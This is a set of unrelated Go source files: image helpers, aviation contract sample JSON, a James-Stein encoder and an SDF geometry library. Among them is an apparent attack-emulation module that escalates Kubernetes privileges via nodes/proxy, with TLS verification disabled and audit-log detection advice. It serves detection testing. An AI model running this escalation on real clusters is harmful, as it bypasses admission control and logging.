r4f, g4f, b4f, a4f := float64(r4), float64(g4), float64(b4), float64(a4)
p1 := (1 - sx + Lf) * (1 - sy + Tf)
p2 := (sx - Lf) * (1 - sy + Tf)
p3 := (1 - sx + Lf) * (sy - Tf)
p4 := (sx - Lf) * (sy - Tf)
r := p1*r1f + p2*r2f + p3*r3f + p4*r4f
g := p1*g1f + p2*g2f + p3*g3f + p4*g4f
b := p1*b1f + p2*b2f + p3*b3f + p4*b4f
a := p1*a1f + p2*a2f + p3*a3f + p4*a4f
dst.Set(x, y, color.RGBA64{uint16(r + 0.5), uint16(g + 0.5), uint16(b + 0.5), uint16(a + 0.5)})
}
}
return dst
}
func Cut(src image.Image, rect image.Rectangle) image.Image {
dstWidth := rect.Dx()
dstHeight := rect.Dy()
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
dst.Set(x, y, src.At(x+rect.Min.X, y+rect.Min.Y))
}
}
return dst
}
func FlipX(src image.Image) image.Image {
rect := src.Bounds()
width := rect.Dx()
height := rect.Dy()
dst := image.NewRGBA(rect)
for x := 0; x < width; x += 1 {
for y := 0; y < height; y += 1 {
dst.Set(x, y, src.At(width-x-1, y))
}
}
return dst
}
func FlipY(src image.Image) image.Image {
rect := src.Bounds()
width := rect.Dx()
height := rect.Dy()
dst := image.NewRGBA(rect)
for x := 0; x < width; x += 1 {
for y := 0; y < height; y += 1 {
dst.Set(x, y, src.At(x, height-y-1))
}
}
return dst
}
func RemoveLine(src image.Image, top, right, bottom, left int) image.Image {
return Cut(src, image.Rect(left, top, src.Bounds().Dx()-right, src.Bounds().Dy()-bottom))
} | base.go | 0.59408 | 0.648807 | base.go | starcoder |
package main
var samples = `
{
"aircraftEvent": {
"aircraft": {
"airline": "AssetID of airline that owns this airplane",
"code": "Aircraft code -- e.g. WN / SWA",
"dateOfBuild": "Aircraft build completed / in service date",
"mode-s": "Aircraft transponder response -- e.g. A68E4A",
"model": "Aircraft model -- e.g. 737-5H4",
"operator": "AssetID of operator that flies this airplane",
"serialNumber": "Aircraft serial number (manufacturer assigned)",
"tailNumber": "Aircraft tail number (airline assigned)",
"variant": "Aircraft model variant -- e.g. B735"
},
"common": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.57831513Z"
}
},
"airlineEvent": {
"airline": {
"code": "The airline 3 letter code.",
"name": "The name of the airline."
},
"common": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.578237395Z"
}
},
"analyticAdjustmentEvent": {
"analyticAdjustment": {
"action": "adjustLifeLimit",
"amount": 123.456,
"assembly": "Assembly serial number",
"reason": "carpe noctem"
}
},
"assemblyEvent": {
"assembly": {
"arlsZone": "tbd",
"ataCode": "The ATA code defining the assembly type, e.g. 32=landing gear, 32-50=steering.",
"lifeLimitInitial": 789,
"name": "The assembly name.",
"serialNumber": "Assembly identifier assigned by manufacturer"
},
"common": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.578334201Z"
}
},
"flightEvent": {
"flight": {
"aircraft": "Aircraft tail or serial number (tbd)",
"analyticHardlanding": true,
"atd": "actual time departure",
"flightnumber": "A flight number",
"from": "3 letter code of originating airport",
"gForce": 123.456,
"hardlanding": true,
"landingType": "code defining landing quality??",
"sta": "standard time arrival",
"std": "standard time departure",
"to": "3 letter code of terminating airport"
}
},
"initEvent": {
"nickname": "TRADELANE",
"version": "The ID of a managed asset. The resource focal point for a smart contract."
},
"inspectionEvent": {
"inspection": {
"action": "BCHECK",
"assembly": "assembly serial number"
}
},
"maintenanceEvent": {
"maintenance": {
"action": "install",
"aircraft": "The serial number of the aircraft to / from which the assembly has been installed / uninstalled.",
"assembly": "This assembly's serial number",
"note": "Maintenance note for this action. Overwritten whenever a new note property is inserted into the maintenance sub-event."
}
},
"state": {
"alerts": {
"active": [
"ACHECK",
"BCHECK",
"HARDLANDING"
],
"cleared": [
"ACHECK",
"BCHECK",
"HARDLANDING"
],
"raised": [
"ACHECK",
"BCHECK",
"HARDLANDING"
]
},
"compliant": true,
"iotCommon": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.57837156Z"
},
"lastEvent": {
"arg": {
"iotCommon": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.578383473Z"
},
"oneOf": {
"aircraft": {
"description": "The aircraft CRUD event",
"properties": {
"aircraft": {
"description": "Writable properties for an aircraft. Note that assetID is the aircraft serial number.",
"properties": {
"airline": {
"description": "AssetID of airline that owns this airplane",
"type": "string"
},
"code": {
"description": "Aircraft code -- e.g. WN / SWA",
"type": "string"
},
"dateOfBuild": {
"description": "Aircraft build completed / in service date",
"type": "string"
},
"mode-s": {
"description": "Aircraft transponder response -- e.g. A68E4A",
"type": "string"
},
"model": {
"description": "Aircraft model -- e.g. 737-5H4",
"type": "string"
},
"operator": {
"description": "AssetID of operator that flies this airplane",
"type": "string"
},
"serialNumber": {
"description": "Aircraft serial number (manufacturer assigned)",
"type": "string"
},
"tailNumber": {
"description": "Aircraft tail number (airline assigned)",
"type": "string"
},
"variant": {
"description": "Aircraft model variant -- e.g. B735",
"type": "string"
}
},
"type": "object"
},
"common": {
"description": "The set of common properties for any event to a contract that adheres to the IoT contract pattern 'partial state as event' for assets and that may have pure events that are *about* these assets.",
"properties": {
"assetID": {
"description": "The ID of a managed asset. The resource focal point for a smart contract.",
"type": "string"
},
"extension": {
"description": "Application managed array of extension properties. Opaque to contract. To be used in emergencies or for sidecar information that is not relevant to contract rule processing.",
"items": {
"properties": {},
"type": "object"
},
"minItems": 0,
"type": "array"
},
"location": {
"description": "A geographical coordinate",
"properties": {
"latitude": {
"type": "number"
},
"longitude": {
"type": "number"
}
},
"type": "object"
},
"references": {
"description": "An array of external references relevant to this asset.",
"items": {
"type": "string"
},
"minItems": 0,
"type": "array"
},
"timestamp": {
"description": "Optional device timestamp. Note that the contract retains the blockchain-assigned transaction UUID and timestamp, which reflect the time that the event arrived at the Hyperledger fabric. The device timestamp has meaning that is relevant to the device, asset and application context.",
"type": "string"
}
},
"required": [
"assetID"
],
"type": "object"
}
},
"type": "object"
},
"airline": {
"description": "The airline CRUD event",
"properties": {
"airline": {
"description": "The writable properties for an airline",
"properties": {
"code": {
"description": "The airline 3 letter code.",
"type": "string"
},
"name": {
"description": "The name of the airline.",
"type": "string"
}
},
"type": "object"
},
"common": {
"description": "The set of common properties for any event to a contract that adheres to the IoT contract pattern 'partial state as event' for assets and that may have pure events that are *about* these assets.",
"properties": {
"assetID": {
"description": "The ID of a managed asset. The resource focal point for a smart contract.",
"type": "string"
},
"extension": {
"description": "Application managed array of extension properties. Opaque to contract. To be used in emergencies or for sidecar information that is not relevant to contract rule processing.",
"items": {
"properties": {},
"type": "object"
},
"minItems": 0,
"type": "array"
},
"location": {
"description": "A geographical coordinate",
"properties": {
"latitude": {
"type": "number"
},
"longitude": {
"type": "number"
}
},
"type": "object"
},
"references": {
"description": "An array of external references relevant to this asset.",
"items": {
"type": "string"
},
"minItems": 0,
"type": "array"
},
"timestamp": {
"description": "Optional device timestamp. Note that the contract retains the blockchain-assigned transaction UUID and timestamp, which reflect the time that the event arrived at the Hyperledger fabric. The device timestamp has meaning that is relevant to the device, asset and application context.",
"type": "string"
}
},
"required": [
"assetID"
],
"type": "object"
}
},
"type": "object"
},
"analyticAdjustment": {
"description": "analytic adjustment event, assetid defines the assembly receiving the adjustment",
"properties": {
"analyticAdjustment": {
"description": "An adjustment based on analytical analysis to the assembly's cycle counters, which translates to changes to life limit *used*. Positive number indicates that the assembly has used more of its life, negative number indicates that the assembly has been granted a bit more life based on conditions such as weather, landing gForces, runway roughness and so on.",
"properties": {
"action": {
"enum": [
"adjustLifeLimit"
],
"type": "string"
},
"amount": {
"type": "number"
},
"assembly": {
"description": "Assembly serial number",
"type": "string"
},
"reason": {
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"assembly": {
"description": "The assembly event. Note that assetID is the assembly serial number",
"properties": {
"assembly": {
"description": "The set of writable properties that define an assembly. Note that assetID is the assembly serial number",
"properties": {
"arlsZone": {
"description": "tbd",
"type": "string"
},
"ataCode": {
"description": "The ATA code defining the assembly type, e.g. 32=landing gear, 32-50=steering.",
"type": "string"
},
"lifeLimitInitial": {
"description": "Initial assembly life limit.",
"type": "integer"
},
"name": {
"description": "The assembly name.",
"type": "string"
},
"serialNumber": {
"description": "Assembly identifier assigned by manufacturer",
"type": "string"
}
},
"required": [
"serialNumber",
"ataCode",
"name"
],
"type": "object"
},
"common": {
"description": "The set of common properties for any event to a contract that adheres to the IoT contract pattern 'partial state as event' for assets and that may have pure events that are *about* these assets.",
"properties": {
"assetID": {
"description": "The ID of a managed asset. The resource focal point for a smart contract.",
"type": "string"
},
"extension": {
"description": "Application managed array of extension properties. Opaque to contract. To be used in emergencies or for sidecar information that is not relevant to contract rule processing.",
"items": {
"properties": {},
"type": "object"
},
"minItems": 0,
"type": "array"
},
"location": {
"description": "A geographical coordinate",
"properties": {
"latitude": {
"type": "number"
},
"longitude": {
"type": "number"
}
},
"type": "object"
},
"references": {
"description": "An array of external references relevant to this asset.",
"items": {
"type": "string"
},
"minItems": 0,
"type": "array"
},
"timestamp": {
"description": "Optional device timestamp. Note that the contract retains the blockchain-assigned transaction UUID and timestamp, which reflect the time that the event arrived at the Hyperledger fabric. The device timestamp has meaning that is relevant to the device, asset and application context.",
"type": "string"
}
},
"required": [
"assetID"
],
"type": "object"
}
},
"type": "object"
},
"flight": {
"description": "flight event, assetID defines airplane against which the event occurred",
"properties": {
"flight": {
"description": "A takeoiff and a landing",
"properties": {
"aircraft": {
"description": "Aircraft tail or serial number (tbd)",
"type": "string"
},
"analyticHardlanding": {
"description": "landing considered hard by analytics",
"type": "boolean"
},
"atd": {
"description": "actual time departure",
"type": "string"
},
"flightnumber": {
"description": "A flight number",
"type": "string"
},
"from": {
"description": "3 letter code of originating airport",
"type": "string"
},
"gForce": {
"description": "force incurred on landing",
"type": "number"
},
"hardlanding": {
"description": "landing considered hard by pilot or aircraft sensor",
"type": "boolean"
},
"landingType": {
"description": "code defining landing quality??",
"type": "string"
},
"sta": {
"description": "standard time arrival",
"type": "string"
},
"std": {
"description": "standard time departure",
"type": "string"
},
"to": {
"description": "3 letter code of terminating airport",
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"inspection": {
"description": "An inspection has been performed against a specific assembly. Will clear one or more alerts and reset their counters.",
"properties": {
"inspection": {
"description": "indicates that an inspection has occured for this assembly",
"properties": {
"action": {
"description": "inspection that has been performed",
"enum": [
"ACHECK",
"BCHECK",
"HARDLANDING"
],
"type": "string"
},
"assembly": {
"description": "assembly serial number",
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"maintenance": {
"description": "maintenance event",
"properties": {
"maintenance": {
"description": "Maintenance consists of installation of an assembly onto an aircraft or uninstallation of same. When an assembly is not installed on an aircraft, it is said to be in inventory or in maintenance. Thus, there is a status on assemblies showing that.",
"properties": {
"action": {
"enum": [
"commission",
"install",
"uninstall",
"startMaintenance",
"endMaintenance",
"scrap"
],
"type": "string"
},
"aircraft": {
"description": "The serial number of the aircraft to / from which the assembly has been installed / uninstalled.",
"type": "string"
},
"assembly": {
"description": "This assembly's serial number",
"type": "string"
},
"note": {
"description": "Maintenance note for this action. Overwritten whenever a new note property is inserted into the maintenance sub-event.",
"type": "string"
}
},
"required": [
"assembly",
"action"
],
"type": "object"
}
},
"type": "object"
}
}
},
"function": "function that created this state object",
"redirectedFromFunction": "function that originally received the event"
},
"oneOf": {
"aircraft": {
"description": "Writable properties for an aircraft. Note that assetID is the aircraft serial number.",
"properties": {
"airline": {
"description": "AssetID of airline that owns this airplane",
"type": "string"
},
"code": {
"description": "Aircraft code -- e.g. WN / SWA",
"type": "string"
},
"dateOfBuild": {
"description": "Aircraft build completed / in service date",
"type": "string"
},
"mode-s": {
"description": "Aircraft transponder response -- e.g. A68E4A",
"type": "string"
},
"model": {
"description": "Aircraft model -- e.g. 737-5H4",
"type": "string"
},
"operator": {
"description": "AssetID of operator that flies this airplane",
"type": "string"
},
"serialNumber": {
"description": "Aircraft serial number (manufacturer assigned)",
"type": "string"
},
"tailNumber": {
"description": "Aircraft tail number (airline assigned)",
"type": "string"
},
"variant": {
"description": "Aircraft model variant -- e.g. B735",
"type": "string"
}
},
"type": "object"
},
"airline": {
"description": "The writable properties for an airline",
"properties": {
"code": {
"description": "The airline 3 letter code.",
"type": "string"
},
"name": {
"description": "The name of the airline.",
"type": "string"
}
},
"type": "object"
},
"assembly": {
"description": "The set of writable properties that define an assembly. Note that assetID is the assembly serial number",
"properties": {
"arlsZone": {
"description": "tbd",
"type": "string"
},
"ataCode": {
"description": "The ATA code defining the assembly type, e.g. 32=landing gear, 32-50=steering.",
"type": "string"
},
"lifeLimitInitial": {
"description": "Initial assembly life limit.",
"type": "integer"
},
"name": {
"description": "The assembly name.",
"type": "string"
},
"serialNumber": {
"description": "Assembly identifier assigned by manufacturer",
"type": "string"
}
},
"required": [
"serialNumber",
"ataCode",
"name"
],
"type": "object"
}
},
"txntimestamp": "Transaction timestamp matching that in the blockchain.",
"txnuuid": "Transaction UUID matching that in the blockchain."
},
"stateFilter": {
"entries": [
{
"qprop": "A qualified property as dot separated levels terminated by a leaf node. An example would be 'common.assetID'.",
"value": "The value to be compared."
}
],
"matchmode": "matchany"
}
}` | contracts/industry/aviation_sample_contract/samples.go | 0.759761 | 0.542257 | samples.go | starcoder |
package encoder
import (
"github.com/humilityai/sam"
)
// JamesSteinRegression is a one-way, target-based encoder for regression
// targets: each categorical value maps to the mean of the target values
// observed for it during construction. You cannot decode
// JamesSteinRegression values, as distinct categories may be encoded
// with the same numerical code.
type JamesSteinRegression struct {
	// encoder maps each categorical value to the mean of its targets.
	encoder map[string]float64
}

// JamesSteinClassification is a one-way, target-based encoder for
// classification targets. You cannot decode JamesSteinClassification
// values, as distinct values may be encoded with the same numerical code.
type JamesSteinClassification struct {
	// encodedValues holds one code per input row, aligned by index with
	// the values/target slices passed to the constructor.
	encodedValues sam.SliceFloat64
}
// NewJamesSteinRegression will create a JamesSteinRegression encoder from
// parallel slices of categorical values and numeric targets. It returns
// ErrTargetLength when the slices differ in length.
func NewJamesSteinRegression(values []string, target []float64) (*JamesSteinRegression, error) {
	if len(values) != len(target) {
		return &JamesSteinRegression{}, ErrTargetLength
	}

	// Group the target values by their categorical value.
	grouped := make(map[string]sam.SliceFloat64)
	for i, value := range values {
		grouped[value] = append(grouped[value], target[i])
	}

	// Each category encodes to the mean of the targets observed for it.
	encoder := make(map[string]float64, len(grouped))
	for value, targets := range grouped {
		encoder[value] = targets.Avg()
	}

	return &JamesSteinRegression{encoder: encoder}, nil
}
// NewJamesSteinClassification will create a JamesSteinClassification
// encoder from parallel slices of categorical values and class labels.
// It returns ErrTargetLength when the slices differ in length.
//
// Fixes vs. the previous version:
//   - the nested maps (groupClassCounts / groupClassBValues) are now
//     initialized before being written to; writing into the nil inner
//     maps previously panicked;
//   - the inner loop no longer shadows the outer classCounts map, which
//     previously made the group/class percentage always equal to 1.
func NewJamesSteinClassification(values []string, target []string) (*JamesSteinClassification, error) {
	if len(target) != len(values) {
		return &JamesSteinClassification{}, ErrTargetLength
	}

	// Tally per-group, per-class, and per-(group, class) frequencies.
	groupCounts := make(sam.MapStringInt)
	classCounts := make(sam.MapStringInt)
	groupClassCounts := make(map[string]sam.MapStringInt)
	for i := 0; i < len(values); i++ {
		group := values[i]
		class := target[i]
		groupCounts.Increment(group)
		classCounts.Increment(class)
		if _, ok := groupClassCounts[group]; !ok {
			groupClassCounts[group] = make(sam.MapStringInt)
		}
		groupClassCounts[group].Increment(class)
	}

	// Compute the shrinkage factor B for every (group, class) pair.
	groupClassBValues := make(map[string]map[string]float64, len(groupClassCounts))
	for group, perClassCounts := range groupClassCounts {
		groupCount := groupCounts[group]
		groupClassBValues[group] = make(map[string]float64, len(perClassCounts))
		for class, count := range perClassCounts {
			classCount := classCounts[class] // global class frequency, not the group's
			groupClassPercentage := float64(count) / float64(classCount)
			classPercentage := float64(classCount) / float64(len(target))
			groupClassValue := (groupClassPercentage * (1 - groupClassPercentage)) / float64(groupCount)
			classValue := (classPercentage * (1 - classPercentage)) / float64(len(target))
			groupClassBValues[group][class] = groupClassValue / (groupClassValue + classValue)
		}
	}

	// One code per input row, aligned by index.
	encodedValues := make(sam.SliceFloat64, len(target))
	for i := 0; i < len(values); i++ {
		encodedValues[i] = groupClassBValues[values[i]][target[i]]
	}

	return &JamesSteinClassification{
		encodedValues: encodedValues,
	}, nil
}
// Get will retrieve the code for the given categorical value, reporting
// whether the value was seen when the encoder was built.
func (e *JamesSteinRegression) Get(s string) (float64, bool) {
	code, found := e.encoder[s]
	return code, found
}
// Codes will return the slice of codes for all of the values
// used in the construction of the JamesSteinClassification encoder.
// The slice is returned by reference, not copied; callers should treat
// it as read-only.
func (e *JamesSteinClassification) Codes() sam.SliceFloat64 {
	return e.encodedValues
}
// Get will retrieve the code for the given categorical value.
func (e *JamesSteinClassification) Get(index int) (float64, error) {
if index < 0 || index > len(e.encodedValues)-1 {
return 0, ErrBounds
}
return e.encodedValues[index], nil
} | james-stein.go | 0.655226 | 0.513546 | james-stein.go | starcoder |
package kubernetes
import (
"context"
"crypto/tls"
_ "embed"
"errors"
"fmt"
"github.com/datadog/stratus-red-team/internal/providers"
"github.com/datadog/stratus-red-team/pkg/stratus"
"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
"io"
authenticationv1 "k8s.io/api/authentication/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
"log"
"net/http"
"strconv"
)
// tf holds the Terraform code (main.tf) embedded at build time; it
// provisions the warm-up prerequisites for this attack technique.
//go:embed main.tf
var tf []byte
// init registers this attack technique with the global Stratus registry
// at package load time. The Description and Detection fields are markdown
// rendered in the documentation; codeBlock/code hold the backtick
// sequences that cannot appear literally inside a raw string.
func init() {
	const codeBlock = "```"
	const code = "`"
	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
		ID:                 "k8s.privilege-escalation.nodes-proxy",
		FriendlyName:       "Privilege escalation through node/proxy permissions",
		Platform:           stratus.Kubernetes,
		IsIdempotent:       true,
		MitreAttackTactics: []mitreattack.Tactic{mitreattack.PrivilegeEscalation},
		Description: `
Uses the node proxy API to proxy a Kubelet request through a worker node. This is a vector of privilege escalation, allowing
any principal with the ` + code + `nodes/proxy` + code + ` permission to escalate their privilege to cluster administrator,
bypassing at the same time admission control checks and logging of the API server.
Warm-up:
- Create a namespace
- Create a service account in this namespace
- Create a cluster role with ` + code + `nodes/proxy` + code + ` permissions
- Bind the cluster role to the service account
Detonation:
- Retrieve a token for the service account with ` + code + `nodes/proxy` + code + ` permissions creating during warm-up
- Use the node proxy API to proxy a benign request to the Kubelet through the worker node
References:
- https://blog.aquasec.com/privilege-escalation-kubernetes-rbac
- https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.22/#-strong-proxy-operations-node-v1-core-strong-
`,
		Detection: `
Using Kubernetes API server audit logs, you can identify when the nodes proxy API is used.
Sample event (shortened):
` + codeBlock + `json hl_lines="3 4"
{
	"objectRef": {
		"resource": "nodes",
		"subresource": "proxy",
		"name": "ip-192-168-34-255.eu-west-1.compute.internal",
		"apiVersion": "v1"
	},
	"http": {
		"url_details": {
			"path": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/"
		},
		"method": "get",
		"status_code": 200,
		"status_category": "OK"
	},
	"kind": "Event",
	"level": "Request",
	"requestURI": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/",
}
` + codeBlock + `
Under normal operating conditions, it's not expected that this API is used frequently.
Consequently, alerting on ` + code + `objectRef.resource == "nodes" && objectRef.subresource == "proxy"` + code + ` should yield minimal false positives.
Additionally, looking at the Kubelet API path that was proxied can help identify malicious activity (/runningpods in this example).
See [kubeletctl](https://github.com/cyberark/kubeletctl/blob/master/pkg/api/constants.go) for an unofficial list of Kubelet API endpoints.
`,
		PrerequisitesTerraformCode: tf, // embedded main.tf (see go:embed above)
		Detonate:                   detonate,
	})
}
// detonate executes the technique: it obtains a token for the service
// account that was granted nodes/proxy permissions during warm-up, picks
// a worker node, and proxies a benign Kubelet request through that node.
func detonate(params map[string]string) error {
	client := providers.K8s().GetClient()
	saName := params["service_account_name"]
	saNamespace := params["service_account_namespace"]

	// Step 1: Get a service account token for our service account, which has "nodes/proxy" permissions
	log.Println("Retrieving service account token for service account " + saName)
	token, err := getServiceAccountToken(saName, saNamespace, client)
	if err != nil {
		return err
	}

	// Step 2: Choose a node to proxy from
	nodeName, err := getRandomNodeName(client)
	if err != nil {
		return err
	}

	// Step 3: Proxy the request to the Kubelet through this node
	log.Println("Using worker node '" + nodeName + "' to proxy to the Kubelet API")
	if _, err := proxyKubeletRequest("/runningpods/", token, nodeName, client); err != nil {
		return err
	}

	log.Println("Successfully proxied a benign Kubelet API request through the worker node")
	return nil
}
// getServiceAccountToken generates a short-lived token for the given
// service account via the TokenRequest API.
//
// Improvement vs. the previous version: the underlying error is wrapped
// with %w instead of flattened into a string, so callers can use
// errors.Is/errors.As on it.
func getServiceAccountToken(serviceAccount string, namespace string, client *kubernetes.Clientset) (string, error) {
	tokenRequest := &authenticationv1.TokenRequest{}
	result, err := client.CoreV1().ServiceAccounts(namespace).CreateToken(context.Background(), serviceAccount, tokenRequest, metav1.CreateOptions{})
	if err != nil {
		return "", fmt.Errorf("unable to retrieve service account token for %s: %w", serviceAccount, err)
	}
	return result.Status.Token, nil
}
// getRandomNodeName returns the name of a worker node, no matter which
// one (currently the first node returned by the API).
//
// Fix vs. the previous version: an empty node list no longer panics with
// an index-out-of-range; an explicit error is returned instead. Errors
// are also wrapped with %w.
func getRandomNodeName(client *kubernetes.Clientset) (string, error) {
	result, err := client.CoreV1().Nodes().List(context.Background(), metav1.ListOptions{})
	if err != nil {
		return "", fmt.Errorf("unable to list worker nodes: %w", err)
	}
	if len(result.Items) == 0 {
		return "", errors.New("unable to find a worker node: cluster returned no nodes")
	}
	return result.Items[0].ObjectMeta.Name, nil
}
// Uses the nodes proxy API to proxy a request through a node to hit the Kubelet
// see https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.22/#-strong-proxy-operations-node-v1-core-strong-
func proxyKubeletRequest(kubeletApiPath string, token string, node string, client *kubernetes.Clientset) (string, error) {
// Note: We have to use a raw HTTP request because it's not straightforward to create a new K8s API client from
// a static bearer token
config := providers.K8s().GetRestConfig()
httpClient := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}
apiServerUrl := fmt.Sprintf("%s/%s", config.Host, config.APIPath)
endpointUrl := fmt.Sprintf("%sapi/v1/nodes/%s/proxy%s", apiServerUrl, node, kubeletApiPath)
req, _ := http.NewRequest("GET", endpointUrl, nil)
req.Header.Set("Authorization", "Bearer "+token)
req.Header.Set("User-Agent", providers.StratusUserAgent)
log.Println("Performing request to " + endpointUrl)
response, err := httpClient.Do(req)
if err != nil {
return "", errors.New("unable to proxy to the Kubelet API: " + err.Error())
}
rawBody, err := io.ReadAll(response.Body)
if err != nil {
return "", errors.New("unable to read Kubelet response body: " + err.Error())
}
body := string(rawBody)
if statusCode := response.StatusCode; statusCode != 200 {
return "", errors.New("got non-200 status code from the proxying API: " + strconv.Itoa(statusCode) + "\nresponse body: " + body)
}
return body, nil
} | internal/attacktechniques/k8s/privilege-escalation/nodes-proxy/main.go | 0.759404 | 0.503235 | main.go | starcoder |
package spt
// http://iquilezles.org/www/articles/distfunctions/distfunctions.htm
import (
"encoding/gob"
"math"
)
// init registers every SDF3 implementation with encoding/gob so that
// values containing these shapes can be serialized and deserialized.
func init() {
	gob.Register(SDFExtrude{})
	gob.Register(SDFRevolve{})
	gob.Register(SDFSphere{})
	gob.Register(SDFCube{})
	gob.Register(SDFTorus{})
	gob.Register(SDFCone{})
	gob.Register(SDFRounded{})
	gob.Register(SDFHollow{})
	gob.Register(SDFElongate{})
	gob.Register(SDFRepeat{})
	gob.Register(SDFEllipsoid{})
}
// SDF3 is a 3D signed distance field. SDF returns the distance function
// (negative inside the shape, positive outside) and Sphere returns a
// bounding sphere for the shape as a (center, radius) pair.
type SDF3 interface {
	SDF() func(Vec3) float64
	Sphere() (Vec3, float64)
}
// SDF3Normal approximates the surface normal of sdf at p by central
// differences with a small fixed step, returning the normalized gradient.
func SDF3Normal(sdf func(Vec3) float64, p Vec3) Vec3 {
	const eps = 0.000001
	grad := Vec3{
		sdf(Vec3{p.X + eps, p.Y, p.Z}) - sdf(Vec3{p.X - eps, p.Y, p.Z}),
		sdf(Vec3{p.X, p.Y + eps, p.Z}) - sdf(Vec3{p.X, p.Y - eps, p.Z}),
		sdf(Vec3{p.X, p.Y, p.Z + eps}) - sdf(Vec3{p.X, p.Y, p.Z - eps}),
	}
	return grad.Unit()
}
// SDFExtrude extrudes a 2D SDF along the Z axis; H is the half-height,
// i.e. the solid spans z in [-H, H].
type SDFExtrude struct {
	H float64
	SDF2
}

// SDF returns the extrusion distance function: the 2D distance in the XY
// plane is combined with the slab distance |z|-H (the opExtrusion
// construction from the iquilezles.org distance-functions reference).
func (s SDFExtrude) SDF() func(Vec3) float64 {
	sdf := s.SDF2.SDF()
	return func(pos Vec3) float64 {
		d := sdf(V2(pos.X, pos.Y))
		w := V2(d, abs(pos.Z)-s.H)
		return min(max(w.X, w.Y), 0.0) + len2(max2(w, Zero2))
	}
}

// Sphere returns a bounding sphere: the 2D bounding circle is lifted to
// z=0 and its radius grown to cover the +-H extent along Z.
func (s SDFExtrude) Sphere() (Vec3, float64) {
	center, radius := s.SDF2.Circle()
	return Zero3.Add(V3(center.X, center.Y, 0)), sqrt(radius*radius + s.H*s.H)
}

// Extrude builds an SDF3 by extruding sdf to a total height h (stored as
// the half-height h/2).
func Extrude(h float64, sdf SDF2) SDF3 {
	return SDFExtrude{h / 2, sdf}
}
// SDFRevolve revolves a 2D SDF around the Y axis at radial offset O.
type SDFRevolve struct {
	O float64
	SDF2
}

// SDF maps a 3D point into the 2D profile's space: the radial distance in
// the XZ plane, minus the offset O, becomes the 2D x coordinate (the
// opRevolution construction from the iquilezles.org reference).
func (s SDFRevolve) SDF() func(Vec3) float64 {
	sdf := s.SDF2.SDF()
	return func(pos Vec3) float64 {
		return sdf(V2(len2(V2(pos.X, pos.Z))-s.O, pos.Y))
	}
}

// Sphere returns a bounding sphere derived from the 2D bounding circle.
// NOTE(review): the radius does not account for the revolve offset O;
// for O > 0 the revolved solid can extend beyond this sphere — verify
// whether callers require the bound to be conservative.
func (s SDFRevolve) Sphere() (Vec3, float64) {
	center, radius := s.SDF2.Circle()
	return Zero3.Add(V3(center.X, center.Y, 0)), radius
}

// Revolve builds an SDF3 by revolving sdf around the Y axis at offset o.
func Revolve(o float64, sdf SDF2) SDF3 {
	return SDFRevolve{o, sdf}
}
// SDFSphere is a sphere of radius R centered at the origin.
type SDFSphere struct {
	R float64
}

// SDF returns the exact distance function for the sphere.
func (s SDFSphere) SDF() func(Vec3) float64 {
	radius := s.R
	return func(p Vec3) float64 {
		return len3(p) - radius
	}
}

// Sphere returns the shape itself as its own bounding sphere.
func (s SDFSphere) Sphere() (Vec3, float64) {
	return Zero3, s.R
}

// Sphere constructs a sphere SDF of radius r centered at the origin.
func Sphere(r float64) SDF3 {
	return SDFSphere{R: r}
}
// SDFCube is an axis-aligned box centered at the origin; X, Y and Z are
// half-extents.
type SDFCube struct {
	X, Y, Z float64
}

// SDF returns the exact box distance (sdBox from the iquilezles.org
// reference): the outside distance is the length of the positive part of
// |p|-b, the inside distance the largest (negative) component.
func (s SDFCube) SDF() func(Vec3) float64 {
	box := V3(s.X, s.Y, s.Z)
	return func(pos Vec3) float64 {
		q := sub3(abs3(pos), box)
		return len3(max3(q, Zero3)) + min(max(q.X, max(q.Y, q.Z)), 0.0)
	}
}

// Sphere returns the bounding sphere through the box corners.
func (s SDFCube) Sphere() (Vec3, float64) {
	return Zero3, len3(V3(s.X, s.Y, s.Z))
}

// Cube builds a box from full edge lengths (stored as half-extents).
func Cube(x, y, z float64) SDF3 {
	return SDFCube{x / 2, y / 2, z / 2}
}
// CubeR builds a box with edge lengths x, y, z whose edges are rounded
// with radius r: the core box is shrunk by the rounding diameter and then
// grown back by Round, preserving the overall dimensions.
func CubeR(x, y, z, r float64) SDF3 {
	shrink := 2 * r
	return Round(r, Cube(x-shrink, y-shrink, z-shrink))
}
// Cylinder builds a cylinder of height h and radius r by extruding a
// circle along Z.
func Cylinder(h, r float64) SDF3 {
	return Extrude(h, Circle(r))
}
// CylinderR builds a cylinder of height h and radius r whose edges are
// rounded with radius ro: the core cylinder is shrunk and then re-grown
// by Round, preserving the overall dimensions.
func CylinderR(h, r, ro float64) SDF3 {
	shrink := 2 * ro
